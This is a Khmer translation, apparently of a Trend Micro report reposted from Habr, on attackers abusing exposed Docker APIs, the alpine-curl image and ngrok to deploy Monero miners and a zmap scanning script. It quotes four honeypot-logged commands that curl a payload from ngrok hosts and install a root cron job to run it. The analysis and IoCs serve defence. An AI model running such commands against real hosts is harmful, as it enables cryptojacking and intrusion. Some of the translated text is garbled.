របៀបដែល Docker API មិនមែនជាកម្មសិទ្ធិ និងរូបភាពសាធារណៈពីសហគមន៍កំពុងត្រូវបានប្រើប្រាស់ដើម្បីចែកចាយអ្នករុករករូបិយប័ណ្ណគ្រីបតូ

យើងបានវិភាគទិន្នន័យដែលប្រមូលបានដោយប្រើធុងទឹកឃ្មុំ ដែលយើងបានបង្កើតដើម្បីតាមដានការគំរាមកំហែង។ ហើយយើងបានរកឃើញសកម្មភាពសំខាន់ៗពីអ្នករុករករូបិយប័ណ្ណគ្រីបតូដែលមិនចង់បាន ឬគ្មានការអនុញ្ញាត ដែលត្រូវបានដាក់ពង្រាយជាធុងបញ្ឆោតទាំងឡាយ ដោយប្រើរូបភាពដែលបានបោះពុម្ពដោយសហគមន៍នៅលើ Docker Hub ។ រូបភាពនេះត្រូវបានប្រើជាផ្នែកនៃសេវាកម្មដែលផ្តល់នូវអ្នករុករករូបិយបណ្ណរូបិយប័ណ្ណដែលមានគំនិតអាក្រក់។

លើសពីនេះទៀតកម្មវិធីសម្រាប់ធ្វើការជាមួយបណ្តាញត្រូវបានដំឡើងដើម្បីជ្រាបចូលទៅក្នុងកុងតឺន័រដែលនៅជិតខាងនិងកម្មវិធី។

យើងទុកកន្លែងក្រេបទឹកឃ្មុំរបស់យើងដូចដើម ពោលគឺជាមួយនឹងការកំណត់លំនាំដើម ដោយគ្មានវិធានការសុវត្ថិភាពណាមួយ ឬការដំឡើងកម្មវិធីបន្ថែមជាបន្តបន្ទាប់។ សូមចំណាំថា Docker មានការណែនាំសម្រាប់ការដំឡើងដំបូង ដើម្បីជៀសវាងកំហុសឆ្គង និងភាពងាយរងគ្រោះសាមញ្ញ។ ប៉ុន្តែ Honeypots ដែលត្រូវបានប្រើប្រាស់គឺជាធុងដែលត្រូវបានរចនាឡើងដើម្បីស្វែងរកការវាយប្រហារដែលមានគោលបំណងទៅកាន់កន្លែងដាក់កុងតឺន័រ មិនមែនជាកម្មវិធីនៅខាងក្នុងធុងនោះទេ។

សកម្មភាពព្យាបាទដែលបានរកឃើញក៏គួរឱ្យកត់សម្គាល់ផងដែរ ព្រោះវាមិនត្រូវការភាពងាយរងគ្រោះ និងឯករាជ្យពីកំណែ Docker ផងដែរ។ ការស្វែងរកការកំណត់រចនាសម្ព័ន្ធមិនត្រឹមត្រូវ ហើយដូច្នេះបើក រូបភាពកុងតឺន័រ គឺជាអ្វីដែលអ្នកវាយប្រហារត្រូវឆ្លងមេរោគលើម៉ាស៊ីនមេជាច្រើនដែលបើក។

Docker API ដែលមិនបានបិទអនុញ្ញាតឱ្យអ្នកប្រើប្រាស់អនុវត្តជួរដ៏ធំទូលាយមួយ។ ក្រុមរួមទាំងការទទួលបានបញ្ជីកុងតឺន័រដែលកំពុងដំណើរការ ការទទួលកំណត់ហេតុពីកុងតឺន័រជាក់លាក់មួយ ការចាប់ផ្តើម បញ្ឈប់ (រួមទាំងការបង្ខំ) និងសូម្បីតែការបង្កើតកុងតឺន័រថ្មីពីរូបភាពជាក់លាក់មួយដែលមានការកំណត់ជាក់លាក់។

នៅខាងឆ្វេងគឺជាវិធីចែកចាយមេរោគ។ នៅខាងស្តាំគឺជាបរិស្ថានរបស់អ្នកវាយប្រហារ ដែលអនុញ្ញាតឲ្យបញ្ចេញរូបភាពពីចម្ងាយ។

ការចែកចាយតាមប្រទេសនៃ 3762 បើក Docker APIs ។ ផ្អែកលើការស្វែងរក Shodan ចុះថ្ងៃទី 12.02.2019/XNUMX/XNUMX

ខ្សែសង្វាក់វាយប្រហារ និងជម្រើសបន្ទុក

សកម្មភាពព្យាបាទត្រូវបានរកឃើញមិនត្រឹមតែដោយមានជំនួយពីក្រេបទឹកឃ្មុំប៉ុណ្ណោះទេ។ ទិន្នន័យពី Shodan បង្ហាញថាចំនួន Docker APIs ដែលត្រូវបានលាតត្រដាង (សូមមើលក្រាហ្វទីពីរ) បានកើនឡើងចាប់តាំងពីយើងបានស៊ើបអង្កេតកុងតឺន័រដែលបានកំណត់រចនាសម្ព័ន្ធមិនត្រឹមត្រូវដែលត្រូវបានប្រើជាស្ពានដើម្បីដាក់ឱ្យប្រើប្រាស់កម្មវិធីរុករករ៉ែរូបិយប័ណ្ណ Monero ។ នៅខែតុលាឆ្នាំមុន (2018 ទិន្នន័យបច្ចុប្បន្ន អ្នកអាចមើលទៅដូចនេះ ប្រហែល អ្នកបកប្រែ) មាន APIs បើក 856 ប៉ុណ្ណោះ។

ការពិនិត្យលើកំណត់ហេតុ Honeypot បានបង្ហាញថាការប្រើប្រាស់រូបភាពកុងតឺន័រក៏ត្រូវបានផ្សារភ្ជាប់ជាមួយនឹងការប្រើប្រាស់ផងដែរ។ ង៉ុកជាឧបករណ៍សម្រាប់បង្កើតការតភ្ជាប់សុវត្ថិភាព ឬការបញ្ជូនបន្តចរាចរណ៍ពីចំណុចដែលអាចចូលដំណើរការបានជាសាធារណៈទៅកាន់អាសយដ្ឋាន ឬធនធានដែលបានបញ្ជាក់ (ឧទាហរណ៍ localhost)។ នេះអនុញ្ញាតឱ្យអ្នកវាយប្រហារបង្កើត URLs ថាមវន្តនៅពេលបញ្ជូនបន្ទុកទៅម៉ាស៊ីនមេដែលបើក។ ខាង​ក្រោម​នេះ​គឺ​ជា​ឧទាហរណ៍​កូដ​ពី​កំណត់​ហេតុ​ដែល​បង្ហាញ​ការ​បំពាន​សេវា ngrok៖

Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”

Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”

Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,

Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”

ដូចដែលអ្នកអាចឃើញ ឯកសារដែលបានផ្ទុកឡើងត្រូវបានទាញយកពី URLs ដែលផ្លាស់ប្តូរជានិច្ច។ URL ទាំងនេះមានកាលបរិច្ឆេទផុតកំណត់ខ្លី ដូច្នេះបន្ទុកមិនអាចទាញយកបានទេបន្ទាប់ពីកាលបរិច្ឆេទផុតកំណត់។

មានជម្រើស payload ពីរ។ ទីមួយគឺជាអ្នករុករករ៉ែដែលបានចងក្រងជាទម្រង់ ELF សម្រាប់ Linux (កំណត់អត្តសញ្ញាណថាជា Coinminer.SH.MALXMR.ATNO) ដែលភ្ជាប់ទៅអាងជីកយករ៉ែ។ ទីពីរគឺជាស្គ្រីប (TrojanSpy.SH.ZNETMAP.A) ដែលត្រូវបានរចនាឡើងដើម្បីទទួលបានឧបករណ៍បណ្តាញជាក់លាក់ដែលប្រើដើម្បីស្កេនជួរបណ្តាញ ហើយបន្ទាប់មកស្វែងរកគោលដៅថ្មី។

ស្គ្រីប dropper កំណត់អថេរពីរដែលបន្ទាប់មកត្រូវបានប្រើដើម្បីដាក់ពង្រាយ cryptocurrency miner ។ អថេរ HOST មាន URL ដែលឯកសារព្យាបាទមានទីតាំងនៅ ហើយអថេរ RIP គឺជាឈ្មោះឯកសារ (តាមពិត សញ្ញា) របស់អ្នករុករករ៉ែដែលត្រូវដាក់ពង្រាយ។ អថេរ HOST ផ្លាស់ប្តូររាល់ពេលដែលអថេរ hash ផ្លាស់ប្តូរ។ ស្គ្រីបក៏ព្យាយាមពិនិត្យមើលថាគ្មានអ្នករុករករូបិយប័ណ្ណគ្រីបតូផ្សេងទៀតកំពុងដំណើរការនៅលើម៉ាស៊ីនមេដែលត្រូវបានវាយប្រហារនោះទេ។

ឧទាហរណ៍នៃអថេរ HOST និង RIP ក៏ដូចជាព័ត៌មានសង្ខេបនៃកូដដែលប្រើដើម្បីពិនិត្យមើលថាគ្មានអ្នករុករករ៉ែផ្សេងទៀតកំពុងដំណើរការទេ

មុនពេលដាក់ឱ្យដំណើរការ miner វាត្រូវបានប្តូរឈ្មោះទៅជា nginx។ កំណែផ្សេងទៀតនៃស្គ្រីបនេះប្តូរឈ្មោះ miner ទៅជាសេវាកម្មស្របច្បាប់ផ្សេងទៀតដែលអាចមានវត្តមាននៅក្នុងបរិស្ថាន។ Linuxជាធម្មតាវាគ្រប់គ្រាន់ដើម្បីរំលងការត្រួតពិនិត្យលើបញ្ជីដំណើរការដែលកំពុងដំណើរការ។

ស្គ្រីបស្វែងរកក៏មានលក្ខណៈពិសេសផងដែរ។ វាដំណើរការជាមួយសេវាកម្ម URL ដូចគ្នាដើម្បីដាក់ពង្រាយឧបករណ៍ចាំបាច់។ ក្នុងចំនោមពួកគេមាន zmap binary ដែលត្រូវបានប្រើដើម្បីស្កេនបណ្តាញ និងទទួលបានបញ្ជីច្រកបើក។ ស្គ្រីបក៏ផ្ទុកប្រព័ន្ធគោលពីរផ្សេងទៀតដែលត្រូវបានប្រើដើម្បីធ្វើអន្តរកម្មជាមួយសេវាកម្មដែលបានរកឃើញ និងទទួលបដាពីពួកគេដើម្បីកំណត់ព័ត៌មានបន្ថែមអំពីសេវាកម្មដែលបានរកឃើញ (ឧទាហរណ៍ កំណែរបស់វា)។

ស្គ្រីបក៏កំណត់ជាមុននូវជួរបណ្តាញមួយចំនួនដែលត្រូវស្កេន ប៉ុន្តែវាអាស្រ័យលើកំណែនៃស្គ្រីប។ វាក៏កំណត់ច្រកគោលដៅពីសេវាកម្មផងដែរ - ក្នុងករណីនេះ Docker - មុនពេលដំណើរការស្កេន។

នៅពេលដែលគោលដៅដែលមានសក្តានុពលត្រូវបានរកឃើញ បដានឹងត្រូវបានលុបចេញពីពួកវាដោយស្វ័យប្រវត្តិ។ ស្គ្រីបក៏ត្រងគោលដៅដោយផ្អែកលើសេវាកម្ម កម្មវិធី សមាសធាតុ ឬវេទិកាដែលវាចាប់អារម្មណ៍ផងដែរ៖ Redis, Jenkins, Drupal, MODX, Kubernetes Master, Docker 1.16 client និង Apache CouchDB ។ ប្រសិនបើម៉ាស៊ីនមេដែលបានស្កេនត្រូវគ្នានឹងពួកវាណាមួយនោះ វាត្រូវបានរក្សាទុកក្នុងឯកសារអត្ថបទ ដែលអ្នកវាយប្រហារអាចប្រើនៅពេលក្រោយសម្រាប់ការវិភាគ និងការលួចចូល។ ឯកសារអត្ថបទទាំងនេះត្រូវបានផ្ទុកឡើងទៅកាន់ម៉ាស៊ីនមេរបស់អ្នកវាយប្រហារតាមរយៈតំណថាមវន្ត។ នោះគឺ URL ដាច់ដោយឡែកមួយត្រូវបានប្រើសម្រាប់ឯកសារនីមួយៗ ដែលមានន័យថាការចូលប្រើប្រាស់ជាបន្តបន្ទាប់គឺពិបាក។

វ៉ិចទ័រវាយប្រហារគឺជារូបភាព Docker ដូចដែលអាចមើលឃើញនៅក្នុងបំណែកពីរបន្ទាប់នៃកូដ។

នៅផ្នែកខាងលើកំពុងប្តូរឈ្មោះទៅជាសេវាកម្មស្របច្បាប់ ហើយនៅខាងក្រោមគឺជារបៀបដែល zmap ត្រូវបានប្រើដើម្បីស្កេនបណ្តាញ

នៅផ្នែកខាងលើគឺជាជួរបណ្តាញដែលបានកំណត់ជាមុន នៅខាងក្រោមគឺជាច្រកជាក់លាក់សម្រាប់ស្វែងរកសេវាកម្ម រួមទាំង Docker ផងដែរ។

រូបថតអេក្រង់បង្ហាញថារូបភាព alpine-curl ត្រូវបានទាញយកច្រើនជាង 10 លានដង

ផ្អែកលើអាល់ផែន Linux និង curl ដែលជាឧបករណ៍ CLI ដែលមានប្រសិទ្ធភាពខ្ពស់សម្រាប់ការផ្ទេរឯកសារតាមរយៈពិធីការផ្សេងៗ អាចត្រូវបានចងក្រង រូបថតរបស់ Docker. ដូចដែលអ្នកអាចឃើញនៅក្នុងរូបភាពមុន រូបភាពនេះត្រូវបានទាញយកច្រើនជាង 10 លានដងរួចទៅហើយ។ មួយចំនួនធំនៃការទាញយកអាចមានន័យថាប្រើរូបភាពនេះជាចំណុចចូល។ រូបភាពនេះត្រូវបានធ្វើបច្ចុប្បន្នភាពជាងប្រាំមួយខែមុន អ្នកប្រើប្រាស់មិនបានទាញយករូបភាពផ្សេងទៀតពីឃ្លាំងនេះញឹកញាប់ទេ។ នៅក្នុង Docker ចំណុចចូល - សំណុំនៃការណែនាំដែលប្រើដើម្បីកំណត់រចនាសម្ព័ន្ធកុងតឺន័រដើម្បីដំណើរការវា។ ប្រសិនបើការកំណត់ចំណុចចូលមិនត្រឹមត្រូវ (ឧទាហរណ៍ កុងតឺន័រត្រូវបានបើកចេញពីអ៊ីនធឺណិត) រូបភាពអាចត្រូវបានប្រើជាវ៉ិចទ័រវាយប្រហារ។ អ្នកវាយប្រហារអាចប្រើវាដើម្បីបញ្ជូនបន្ទុក ប្រសិនបើពួកគេរកឃើញកុងតឺន័រដែលបានកំណត់រចនាសម្ព័ន្ធខុស ឬបើកទុកដោយមិនបានគាំទ្រ។

វាជាការសំខាន់ក្នុងការកត់សម្គាល់ថារូបភាពនេះ (alpine-curl) ខ្លួនវាមិនមែនជាព្យាបាទទេប៉ុន្តែដូចដែលអ្នកបានឃើញខាងលើវាអាចត្រូវបានប្រើដើម្បីអនុវត្តមុខងារព្យាបាទ។ រូបភាព Docker ស្រដៀងគ្នាក៏អាចត្រូវបានប្រើដើម្បីធ្វើសកម្មភាពព្យាបាទផងដែរ។ យើងបានទាក់ទង Docker និងធ្វើការជាមួយពួកគេលើបញ្ហានេះ។

អនុសាសន៍

ការកំណត់មិនត្រឹមត្រូវ នៅសល់ បញ្ហាថេរ សម្រាប់ក្រុមហ៊ុនជាច្រើន ជាពិសេសក្រុមហ៊ុនដែលកំពុងអនុវត្ត DevOpsផ្តោតលើការអភិវឌ្ឍន៍ និងការចែកចាយយ៉ាងឆាប់រហ័ស។ អ្វីគ្រប់យ៉ាងគឺកាន់តែធ្ងន់ធ្ងរឡើងដោយសារតម្រូវការក្នុងការអនុលោមតាមច្បាប់សវនកម្ម និងការត្រួតពិនិត្យ តម្រូវការក្នុងការត្រួតពិនិត្យការសម្ងាត់ទិន្នន័យ ក៏ដូចជាការខូចខាតដ៏ធំសម្បើមពីការមិនគោរពតាមរបស់ពួកគេ។ ការបញ្ចូលស្វ័យប្រវត្តិកម្មសុវត្ថិភាពទៅក្នុងវដ្តនៃការអភិវឌ្ឍន៍មិនត្រឹមតែជួយអ្នកស្វែងរករន្ធសុវត្ថិភាពដែលប្រហែលជាមិនអាចរកឃើញនោះទេ ប៉ុន្តែវាក៏ជួយអ្នកកាត់បន្ថយបន្ទុកការងារដែលមិនចាំបាច់ផងដែរ ដូចជាដំណើរការបង្កើតកម្មវិធីបន្ថែមសម្រាប់ភាពងាយរងគ្រោះនីមួយៗដែលបានរកឃើញ ឬការកំណត់មិនត្រឹមត្រូវបន្ទាប់ពីកម្មវិធីត្រូវបានដាក់ឱ្យប្រើប្រាស់។

ឧប្បត្តិហេតុដែលបានពិភាក្សានៅក្នុងអត្ថបទនេះបង្ហាញពីតម្រូវការក្នុងការគិតគូរពីសុវត្ថិភាពតាំងពីដំបូង រួមទាំងអនុសាសន៍ដូចខាងក្រោមៈ

• សម្រាប់អ្នកគ្រប់គ្រងប្រព័ន្ធ និងអ្នកអភិវឌ្ឍន៍៖ ពិនិត្យមើលការកំណត់ API របស់អ្នកជានិច្ច ដើម្បីប្រាកដថាអ្វីៗគ្រប់យ៉ាងត្រូវបានកំណត់រចនាសម្ព័ន្ធដើម្បីទទួលយកតែសំណើពីម៉ាស៊ីនមេជាក់លាក់ ឬបណ្តាញខាងក្នុងប៉ុណ្ណោះ។
• អនុវត្តតាមគោលការណ៍នៃសិទ្ធិតិចបំផុត៖ ធានាថារូបភាពកុងតឺន័រត្រូវបានចុះហត្ថលេខា និងផ្ទៀងផ្ទាត់ កំណត់ការចូលប្រើសមាសធាតុសំខាន់ៗ (សេវាកម្មបើកដំណើរការកុងតឺន័រ) និងបន្ថែមការអ៊ិនគ្រីបទៅនឹងការតភ្ជាប់បណ្តាញ។
• ធ្វើតាម អនុសាសន៍ និងបើកយន្តការសុវត្ថិភាព ឧ. ពី Docker និងសាងសង់ឡើងនៅក្នុង លក្ខណៈសុវត្ថិភាព.
• ប្រើការស្កែនម៉ោងដំណើរការ និងរូបភាពដោយស្វ័យប្រវត្តិ ដើម្បីទទួលបានព័ត៌មានបន្ថែមអំពីដំណើរការដែលកំពុងដំណើរការនៅក្នុងកុងតឺន័រ (ឧទាហរណ៍ ដើម្បីស្វែងរកការក្លែងបន្លំ ឬស្វែងរកភាពងាយរងគ្រោះ)។ ការគ្រប់គ្រងកម្មវិធី និងការត្រួតពិនិត្យភាពត្រឹមត្រូវជួយតាមដានការផ្លាស់ប្តូរមិនប្រក្រតីចំពោះម៉ាស៊ីនមេ ឯកសារ និងតំបន់ប្រព័ន្ធ។

Trendmicro ជួយក្រុម DevOps បង្កើតដោយសុវត្ថិភាព ដំណើរការយ៉ាងឆាប់រហ័ស និងចាប់ផ្តើមគ្រប់ទីកន្លែង។ និន្នាការមីក្រូ Hybrid Cloud Security ផ្តល់នូវសុវត្ថិភាពដ៏មានឥទ្ធិពល សម្រួល និងស្វ័យប្រវត្តិនៅទូទាំងបំពង់ DevOps របស់ស្ថាប័ន និងផ្តល់នូវការការពារការគំរាមកំហែងជាច្រើន XGen ដើម្បីការពារបន្ទុករាងកាយ និម្មិត និងពពកនៅពេលដំណើរការ។ វាក៏បន្ថែមសុវត្ថិភាពកុងតឺន័រជាមួយ សន្តិសុខជ្រៅ и ការត្រួតពិនិត្យឆ្លាតវៃសុវត្ថិភាពជ្រៅដែលស្កែនរូបភាពកុងតឺន័រ Docker សម្រាប់មេរោគ និងភាពងាយរងគ្រោះនៅចំណុចណាមួយក្នុងបំពង់អភិវឌ្ឍន៍ ដើម្បីការពារការគំរាមកំហែង មុនពេលពួកវាត្រូវបានដាក់ឱ្យប្រើប្រាស់។

សញ្ញានៃការសម្របសម្រួល

សញ្ញាដែលទាក់ទង៖

• 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
• f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)

នៅលើ វគ្គសិក្សាវីដេអូ Docker ការអនុវត្តវាគ្មិនបង្ហាញពីការកំណត់អ្វីដែលត្រូវធ្វើមុនគេ ដើម្បីកាត់បន្ថយលទ្ធភាព ឬជៀសវាងទាំងស្រុងនូវការកើតឡើងនៃស្ថានភាពដែលបានពិពណ៌នាខាងលើ។ ហើយនៅថ្ងៃទី 19-21 ខែសីហានៅអ៊ីនធឺណែតដែលពឹងផ្អែកខ្លាំង ឧបករណ៍ និងបោក DevOps អ្នកអាចពិភាក្សាអំពីបញ្ហាសុវត្ថិភាពទាំងនេះ និងស្រដៀងគ្នាជាមួយសហសេវិក និងគ្រូបង្រៀននៅតុមូល ដែលគ្រប់គ្នាអាចនិយាយចេញមក និងស្តាប់នូវការឈឺចាប់ និងភាពជោគជ័យរបស់មិត្តរួមការងារដែលមានបទពិសោធន៍។

ប្រភព: www.habr.com